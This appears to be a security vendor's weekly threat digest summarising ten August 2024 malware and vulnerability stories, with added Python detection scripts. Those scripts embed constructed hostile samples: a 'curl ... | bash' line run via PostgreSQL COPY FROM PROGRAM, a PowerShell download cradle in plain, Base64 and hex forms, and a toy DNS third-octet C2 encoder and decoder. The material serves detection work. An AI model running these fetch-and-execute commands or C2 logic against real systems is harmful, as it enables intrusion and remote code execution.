By security practitioners, for security practitioners

Weekly Top 10: 8.26.2024: Analyzing the Cthulhu Stealer Malware for macOS; PG_MEM: A Malware Hidden in the Postgres Processes; NUMOZYLOD Malware Distributed Through Popular Searches, and More.

WEEKLY TOP TEN: August 26, 2024, 16:00 GMT

  1. Analyzing the Cthulhu Stealer Malware for macOS

    Cthulhu Stealer is a new information stealer for macOS, sold as Malware-as-a-Service (MaaS). Researchers at Cado Security have published a deep dive into its core functionality. The malware is distributed as a .dmg that masquerades as legitimate, well-known software such as Adobe products or CleanMyMac. When the victim opens the disk image they are prompted for their password; if they enter it, the malware uses it to dump the Keychain and begins exfiltrating the harvested credentials and other data.
  2. PG_MEM: A Malware Hidden in the Postgres Processes

    Researchers at Aqua Security have identified PG_MEM, a cryptomining malware that targets PostgreSQL. The infection chain starts with a brute-force attack against an internet-exposed PostgreSQL database. Once a password is guessed, the attacker creates a new superuser role and uses it to lock the legitimate superuser out of the account. PostgreSQL's ability to run operating-system commands from SQL (for example COPY ... FROM PROGRAM) is then abused to drop and execute files on the host, ending with PG_MEM itself, a Monero (XMR) miner.
  3. PEAKLIGHT: Decoding the Stealthy Memory-Only Malware

    Mandiant has documented PEAKLIGHT, a memory-only malware dropper that has been observed delivering several MaaS infostealers, including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. Initial access comes from a .LNK file disguised as a movie and distributed through pirating sites. When the .LNK is executed it runs a PowerShell script that loads an obfuscated JavaScript dropper into memory, never writing it to disk. That dropper launches a further PowerShell command, encoded in either Base64 or hex, which downloads the final payloads: the infostealers named above.
  4. NUMOZYLOD Malware Distributed Through Popular Searches

    NUMOZYLOD is a malicious PowerShell script distributed through malvertising, SEO poisoning, and typosquatted domains. Mandiant attributes it to UNC4536, which runs a MaaS operation. The actors build typosquatted sites that are near-identical copies of the legitimate vendor's site; a victim who trusts the page downloads the malware instead of the application they were looking for. UNC4536 packages the payload as MSIX, a Windows application package format; bundling NUMOZYLOD inside what looks like a legitimate installer helps it evade detection. Once running, the PowerShell script has been seen installing a variety of other malware families.
  5. Hackers Are Exploiting Critical Bug in Litespeed Cache Plugin

    A critical vulnerability in the LiteSpeed Cache WordPress plugin is being actively exploited. In versions up to and including 6.3.0.1, a weak security hash check allows unauthenticated privilege escalation (CVE-2024-28000). The fix shipped in version 6.4 on August 13th, but that has not stopped attackers from going after sites that have not updated: security firm Wordfence reported blocking over 48,000 attack attempts in a single 24-hour period. The plugin is installed on over 5 million WordPress sites, and roughly 63% of those installations are still running a vulnerable version.
  6. Azure Kubernetes Services Vulnerability Exposed Sensitive Information

    Mandiant disclosed a vulnerability affecting Azure Kubernetes Services (AKS) clusters that have no NetworkPolicy configured. An attacker with command execution inside any Pod could retrieve the TLS bootstrap tokens used to enrol nodes, use them to mint a kubelet certificate for a workstation they control, and then read every secret in the cluster. Mandiant recommends adopting a process for creating restrictive NetworkPolicies that allow Pods to reach only the services they require; cutting off the Pod's access to the token source breaks the entire attack chain.
  7. Qilin Ransomware Now Steals Credentials From Chrome Browsers

    Sophos has reported a new tactic from the Qilin ransomware group: harvesting credentials stored in Google Chrome. In the intrusion Sophos observed, the attackers pushed a PowerShell script to every machine in the domain via Group Policy; on each host it collected the passwords saved in Chrome and exfiltrated them. Stealing browser credentials across the whole domain gives the actors access that survives the ransomware cleanup. One mitigation is to manage Chrome centrally and disable saving passwords in the browser (Chrome's PasswordManagerEnabled policy), steering users to a dedicated password manager instead.
  8. CISA Warns of Actively Exploited SolarWinds Web Help Desk Vulnerability

    CISA has warned that a critical vulnerability in SolarWinds Web Help Desk, tracked as CVE-2024-28986 with a CVSS score of 9.8, is being exploited in the wild. The flaw allows unauthenticated remote code execution and complete takeover of the affected system. SolarWinds has released a patch, but its advisory did not mention that the vulnerability was already being exploited.
  9. Google Releases Stable Channel Update for Desktop

    Google has released Chrome 128 to the stable channel with 37 security fixes, including a patch for a zero-day exploited in the wild: CVE-2024-7971, a type confusion bug in the V8 JavaScript engine with a CVSS base score of 8.8. Five other high-severity fixes are included. The browser is one of the largest attack surfaces on an endpoint, and this is the ninth actively exploited Chrome zero-day patched this year, so update promptly.
  10. New Backdoor Targeting Taiwan Employs Stealthy Communications

    A new backdoor named Msupedge, deployed against a university in Taiwan, has been discovered by Symantec. It takes the form of a DLL; two variants, wuplog.dll and wmiclnt.dll, were found, with wuplog.dll loaded by Apache. The backdoor communicates with its C2 server over DNS tunnelling, a technique rarely seen in practice: the backdoor resolves a hostname, and the third octet of the returned IP address is the command, telling it to download a file, create a process, or sleep. Symantec does not yet have enough evidence to attribute the backdoor or determine its purpose.
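The PG_MEM chain in item 2 (brute force, new superuser, COPY ... PROGRAM) leaves a recognisable trail in the PostgreSQL server log. The script below is an added example, not code from Aqua Security or the PG_MEM report: it walks constructed log lines (not real PG_MEM traces) and assumes `log_line_prefix = '%m [%p] %u@%d %h '` so that the client address appears on every line. It flags hosts that cross a failed-login threshold and then succeed, role statements that grant or strip SUPERUSER, and any COPY that shells out via PROGRAM.

```python
import re
from collections import defaultdict

# Constructed PostgreSQL server log lines (not taken from the Aqua report), assuming
# log_line_prefix = '%m [%p] %u@%d %h ' so that the client address is in every line.
SAMPLE_LOG = """\
2024-08-20 10:00:01.001 UTC [4101] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:01.105 UTC [4102] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:01.210 UTC [4103] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:01.315 UTC [4104] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:01.420 UTC [4105] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:02.000 UTC [4106] postgres@postgres 203.0.113.5 LOG:  connection authorized: user=postgres database=postgres
2024-08-20 10:00:02.300 UTC [4106] postgres@postgres 203.0.113.5 LOG:  statement: CREATE ROLE sysadm WITH SUPERUSER LOGIN PASSWORD 'x'
2024-08-20 10:00:02.500 UTC [4106] postgres@postgres 203.0.113.5 LOG:  statement: ALTER ROLE postgres WITH NOSUPERUSER
2024-08-20 10:00:03.000 UTC [4107] sysadm@postgres 203.0.113.5 LOG:  statement: COPY tmp FROM PROGRAM 'curl -s http://198.51.100.9/x | bash'
2024-08-20 10:05:00.000 UTC [4120] app@inventory 10.0.0.12 LOG:  statement: SELECT count(*) FROM orders
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@ ]+)@(?P<db>\S+) (?P<host>\S+) "
    r"(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
FAIL_RE = re.compile(r"password authentication failed")
# \bSUPERUSER\b deliberately does not match NOSUPERUSER (no word boundary inside it).
GRANT_RE = re.compile(r"\b(CREATE|ALTER)\s+(ROLE|USER)\b.*\bSUPERUSER\b", re.I)
STRIP_RE = re.compile(r"\bALTER\s+(ROLE|USER)\b.*\b(NOSUPERUSER|NOLOGIN|PASSWORD)\b", re.I)
PROGRAM_RE = re.compile(r"\bCOPY\b.*\b(FROM|TO)\s+PROGRAM\b", re.I)


def parse_line(line):
    """Split one log line into its prefix fields and message; None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines, fail_threshold=5):
    """Walk the log in order and collect the PG_MEM-style stages per client host."""
    failures = defaultdict(int)
    result = {"brute_force": {}, "superuser_grants": [], "privilege_stripping": [],
              "program_copy": [], "alerts": []}
    for raw in lines:
        ev = parse_line(raw)
        if not ev:
            continue
        host, msg = ev["host"], ev["msg"]
        if FAIL_RE.search(msg):
            failures[host] += 1
            if failures[host] >= fail_threshold:
                result["brute_force"][host] = failures[host]
            continue
        # Any non-failure event from a host that already crossed the threshold means the
        # brute force succeeded (or the attacker moved on to abuse): raise an alert once.
        if failures[host] >= fail_threshold and host not in result["alerts"]:
            result["alerts"].append(host)
        stmt = msg.split("statement: ", 1)[1] if "statement: " in msg else ""
        record = (host, ev["user"], stmt)
        if GRANT_RE.search(stmt):
            result["superuser_grants"].append(record)
        if STRIP_RE.search(stmt):
            result["privilege_stripping"].append(record)
        if PROGRAM_RE.search(stmt):
            result["program_copy"].append(record)
    return result


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG.splitlines()).items():
        print(key, value)
```

Statement logging (`log_statement = 'ddl'` or `'all'`) is needed for the role and COPY stages to appear at all; without it only the authentication failures are visible. COPY ... FROM/TO PROGRAM is available only to superusers and members of pg_execute_server_program, which is why the attacker's first move after brute force is to create a superuser role, and why unexpected members of that role or unexpected superusers in pg_roles are worth a regular check.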
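Item 3 describes PEAKLIGHT handing off through PowerShell commands encoded in Base64 or hex before the download cradle is visible. The following is an added example, not code from Mandiant or from PEAKLIGHT itself: it takes constructed PowerShell command lines (built in the script, not real samples), peels the `-EncodedCommand` layer (Base64 of UTF-16LE) and any long hex string, and then looks for download-cradle indicators in both the raw line and the decoded layers. The indicator list and the `example.invalid` URL are assumptions for illustration.

```python
import base64
import binascii
import re

# Constructed PowerShell command lines (not real PEAKLIGHT samples), in the shape they
# appear in Sysmon Event ID 1 or Security 4688 command-line fields. STAGE is a plain
# download cradle; the Base64 and hex forms are derived from it at import time.
STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.js')"
ENCODED = base64.b64encode(STAGE.encode("utf-16le")).decode("ascii")
HEXED = STAGE.encode("utf-8").hex()

SAMPLE_LINES = [
    "powershell.exe -w hidden -ep bypass -c " + STAGE,
    "powershell.exe -NoP -NonI -W Hidden -EncodedCommand " + ENCODED,
    "powershell.exe -c \"$h='" + HEXED
    + "';IEX([Text.Encoding]::UTF8.GetString([Convert]::FromHexString($h)))\"",
    "powershell.exe -c Get-ChildItem C:\\Users\\Public\\Videos",
]

# -EncodedCommand and its short forms take Base64 of UTF-16LE text.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# A run of at least 16 hex pairs that is not part of a longer hex-looking token.
HEX_RE = re.compile(r"(?<![0-9A-Fa-f])((?:[0-9A-Fa-f]{2}){16,})(?![0-9A-Fa-f])")
# Download-cradle and decode indicators; an assumed list, extend to taste.
CRADLE_RE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|"
    r"\bIEX\b|FromBase64String|FromHexString|-w(?:indowstyle)?\s+hidden",
    re.I,
)


def decode_layers(cmdline):
    """Return the decoded text of every Base64 (UTF-16LE) and hex layer found in cmdline."""
    layers = []
    remainder = cmdline
    m = ENC_RE.search(cmdline)
    if m:
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            layers.append(raw.decode("utf-16le", errors="replace"))
        except (binascii.Error, ValueError):
            pass  # not valid Base64 after all; fall through to the hex scan
        # Drop the Base64 token so the hex scan cannot misfire on it.
        remainder = cmdline[: m.start(1)] + cmdline[m.end(1):]
    for hm in HEX_RE.finditer(remainder):
        layers.append(bytes.fromhex(hm.group(1)).decode("utf-8", errors="replace"))
    return layers


def triage(lines):
    """Report each command line whose raw text or decoded layers contain cradle indicators."""
    findings = []
    for line in lines:
        layers = decode_layers(line)
        hits = set()
        for text in [line] + layers:
            hits.update(h.lower() for h in CRADLE_RE.findall(text))
        if hits:
            findings.append({"cmdline": line[:48] + "...", "decoded_layers": len(layers),
                             "indicators": sorted(hits)})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES):
        print(finding)
```

The benign `Get-ChildItem` line produces no finding, while the encoded lines are caught only because the decoded layer is scanned too: a rule that keys on the visible command line alone sees nothing but a Base64 blob. PowerShell Script Block Logging (Event ID 4104) records the decoded script directly and is the better source where it is enabled; the decode step above is for the common case where only process command lines are collected.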
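Item 10 describes a C2 channel in which the command lives in the third octet of a resolved IP address. The script below is an added example, not Symantec's code or anything from Msupedge: it shows both sides of such a channel (the C2 resolver crafting an answer, the implant reading the octet) and a resolver-log heuristic for spotting it. The opcode table, the `updates.example.invalid` zone, the three-label zone boundary, the "sleep on unknown opcode" behaviour, and the DNS log records are all assumptions; the real Msupedge opcode values are documented by Symantec and are not reproduced here.

```python
from collections import defaultdict

# Hypothetical opcode table for illustration; Symantec's report documents the real
# values and they are not reproduced here. Unknown opcodes fall back to "sleep".
OPCODES = {16: "download", 32: "create_process", 48: "sleep"}


def c2_answer(opcode, base="203.0.113.7"):
    """C2 side: craft the A record for a query, carrying `opcode` in the third octet."""
    octets = [int(x) for x in base.split(".")]
    octets[2] = opcode & 0xFF
    return ".".join(str(o) for o in octets)


def implant_decode(answer_ip):
    """Implant side: read the third octet of the resolved address and map it to an action."""
    return OPCODES.get(int(answer_ip.split(".")[2]), "sleep")


def run_implant(query_names, resolve):
    """Simulate the beacon loop: one lookup per name, one action per answer.

    `resolve` is any callable name -> dotted IP, so the loop runs offline against a dict.
    """
    return [implant_decode(resolve(name)) for name in query_names]


# Constructed resolver log records (client, query name, answer) for the detection side.
SAMPLE_DNS = [
    ("10.0.0.7", "k7x2.updates.example.invalid", "203.0.16.7"),
    ("10.0.0.7", "p9q1.updates.example.invalid", "203.0.32.7"),
    ("10.0.0.7", "m3z8.updates.example.invalid", "203.0.48.7"),
    ("10.0.0.7", "a1b2.updates.example.invalid", "203.0.16.7"),
    ("10.0.0.9", "www.vendor.example", "198.51.100.20"),
    ("10.0.0.9", "cdn.vendor.example", "198.51.100.21"),
]


def parent_domain(name, labels=3):
    """Assumed zone boundary: the last `labels` labels of the query name."""
    return ".".join(name.split(".")[-labels:])


def find_octet_channels(records, min_distinct=3):
    """Heuristic: flag (client, zone) pairs whose distinct answers differ only in octet 3.

    Ordinary load-balanced or CDN answers vary across several octets; a channel that
    encodes commands in one octet keeps the other three fixed.
    """
    by_key = defaultdict(set)
    for client, name, answer in records:
        by_key[(client, parent_domain(name))].add(tuple(int(x) for x in answer.split(".")))
    flagged = []
    for key, answers in sorted(by_key.items()):
        if len(answers) < min_distinct:
            continue
        fixed = {(a[0], a[1], a[3]) for a in answers}
        if len(fixed) == 1:
            flagged.append(key)
    return flagged


if __name__ == "__main__":
    fake_resolver = {"a.updates.example.invalid": c2_answer(16),
                     "b.updates.example.invalid": c2_answer(32)}
    print(run_implant(list(fake_resolver), fake_resolver.__getitem__))
    print(find_octet_channels(SAMPLE_DNS))
```

The heuristic is deliberately narrow: it needs several distinct answers from one client for one zone, and it only fires when the first, second and fourth octets never move. Combine it with the usual DNS tunnelling signals (many unique subdomains per zone, high-entropy labels, query volume from a server that should rarely resolve anything) before acting on it, and tune the zone boundary to your resolver's view of public suffixes.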

Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The ten stories above were selected from the 40+ items we judged most significant during the week, ranked by highest risk and drawing on multiple sources where available.

